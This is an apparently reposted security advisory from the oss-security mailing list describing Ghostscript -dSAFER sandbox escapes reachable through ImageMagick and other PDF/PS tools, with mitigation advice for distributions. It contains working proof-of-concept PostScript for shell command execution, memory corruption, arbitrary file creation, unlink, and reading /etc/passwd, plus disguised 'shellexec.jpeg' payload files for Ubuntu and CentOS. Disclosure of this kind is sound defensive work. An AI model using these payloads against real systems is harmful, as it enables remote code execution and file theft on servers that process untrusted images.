Ghostscript Multiple Vulnerabilities

2018.08.22
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

http://seclists.org/oss-sec/2018/q3/142 These are critical and trivial remote code execution bugs in things like ImageMagick, Evince, GIMP, and most other PDF/PS tools. ---- Hello, this was discussed on the distros list, but it was suggested to move discussion to oss-security. You might recall I posted a bunch of -dSAFER sandbox escapes in ghostscript a few years ago: http://seclists.org/oss-sec/2016/q4/29 I found a few file disclosure, shell command execution, memory corruption and type confusion bugs. There was also one that was found exploited in the wild. There was also a similar widely exploited issue that could be exploited identically. TL;DR: I *strongly* suggest that distributions start disabling PS, EPS, PDF and XPS coders in policy.xml by default. $ convert input.jpg output.gif uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 I've found a few more surprising ways to reach ghostscript recently, so went back to look again and found a few more. 1. /invalidaccess checks stop working after a failed restore, so you can just execute shell commands if you handle the error. Exploitation is very trivial. Repro: $ gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null GS>legal GS>{ null restore } stopped { pop } if GS>legal GS>mark /OutputFile (%pipe%id) currentdevice putdeviceprops GS<1>showpage uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 (ImageMagick PoC at end of mail) 2. setcolor claims no operand checking is necessary, because it's hidden behind a pseudo-operator of the same name. That's true, but you can still call it indirectly via setpattern, so type checking is necessary. Repro: $ gs -q -sDEVICE=ppmraw -dSAFER GS><< /Whatever 16#414141414141 >> setpattern Segmentation fault 3. The LockDistillerParams boolean isn't type checked, so nice easy type confusion. Repro: $ gs -q -sDEVICE=ppmraw -dSAFER GS><< /LockDistillerParams 16#4141414141414141 >> .setdistillerparams Segmentation fault 4. .tempfile permissions don't seem to work, I don't know when they broke. You're not supposed to be able to open files outside of the patterns in the PermitFileReading array, but that doesn't seem to work for me e.g.: $ strace -fefile gs -sDEVICE=ppmraw -dSAFER ... GS>(/proc/self/cwd/hello) (w) .tempfile open("/proc/self/cwd/hello26E8LQ", O_RDWR|O_CREAT|O_EXCL, 0600) = 3 GS<2>dup GS<3>(hello) writestring GS<2>closefile This means you can create a file in any directory (I don't think you can prevent the random suffix). Additionally, I have a trick to let you read and unlink any file you have permission to. Here is how to unlink() any file: $ strace -fefile gs -sDEVICE=ppmraw -dSAFER ... GS>{ .bindnow } stopped {} if GS>(/etc/passwd) [] .tempfile GS<2>.quit unlink("/etc/passwd") = -1 EACCES (Permission denied) +++ exited with 0 +++ Reading is more complicated, because the best way I know how to do it is to interpret a file as as PostScript and catch the syntax errors, here is an example: $ cat fileread.ps /FileToSteal (/etc/passwd) def errordict /undefinedfilename { FileToSteal % save the undefined name } put errordict /undefined { (STOLEN: ) print counttomark { ==only } repeat (\n) print FileToSteal } put errordict /invalidfileaccess { pop } put errordict /typecheck { pop } put FileToSteal (w) .tempfile statusdict begin 1 1 .setpagesize end quit $ gs -q -sDEVICE=ppmraw -dSAFER fileread.ps GPL Ghostscript 9.23: STOLEN: root:x:0:0:root: STOLEN: daemon:x:1:1:daemon:/bash/bin/root:(/etc/passwd) STOLEN: bin:x:2:2:bin:/nologin/sbin/usr/sbin:/usr(/etc/passwd) STOLEN: sys:x:3:3:sys:/nologin/sbin/usr/bin:(/etc/passwd) STOLEN: sync:x:4:65534:sync:/nologin/sbin/usr/dev:(/etc/passwd) STOLEN: games:x:5:60:games:/sync/bin/bin:(/etc/passwd) This can be used to steal arbitrary files from webservers that use ImageMagick by encoding file contents into the image output, see my previous PoC here for an example. i.e. You can make convert malicious.jpg thumbnail.jpg produce an image with the contents of a file visible. These bugs were found manually, I also wrote a fuzzer and I'm working on minimizing a very large number of testcases that I'm planning to report over the next few days. I will just file those issues upstream and not post each individual one here, you can monitor https://bugs.ghostscript.com/ if you want to. I expect there to be several dozen unique bugs. In the meantime, I really *strongly* suggest that distributions start disabling PS, EPS, PDF and XPS coders in policy.xml by default. I think this is the number one "unexpected ghostscript" vector, imho this should happen asap. IMHO, -dSAFER is a fragile security boundary at the moment, and executing untrusted postscript should be discouraged, at least by default. Please note, ImageMagick sends some initialization commands to ghostscript that breaks my minimal PoC, but you can just undo their changes in PostScript. This one works for me on the version in Ubuntu: $ cat shellexec.jpeg %!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%id) currentdevice putdeviceprops $ convert shellexec.jpeg whatever.gif uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 For CentOS, try this: $ cat shellexec.jpeg %!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%id) currentdevice putdeviceprops $ convert shellexec.jpeg whatever.gif uid=1000(taviso) gid=1000(taviso) groups=1000(taviso),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 ################################################################################ Upstream bugs filed so far on https://bugs.ghostscript.com (some have restricted access) 699654 /invalidaccess checks stop working after a failed restore 699655 missing type checking in setcolor 699656 LockDistillerParams boolean missing type checks 699659 missing type check in ztype 699657 .tempfile SAFER restrictions seem to be broken 699658 Bypassing PermitFileReading by handling undefinedfilename error ################################################################################ Repro for "missing type check in ztype": $ gs -q -sDEVICE=ppmraw -dSAFER GS>null [[][][][][][][][][][][][][][][]] .type Segmentation fault ################################################################################ more upstream bugs 699665 memory corruption in aesdecode 699663 .setdistillerkeys memory corruption 699664 corrupt device object after error in job 699660 shading_param incomplete type checking 699661 pdf14 garbage collection memory corruption 699662 calling .bindnow causes sideeffects


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top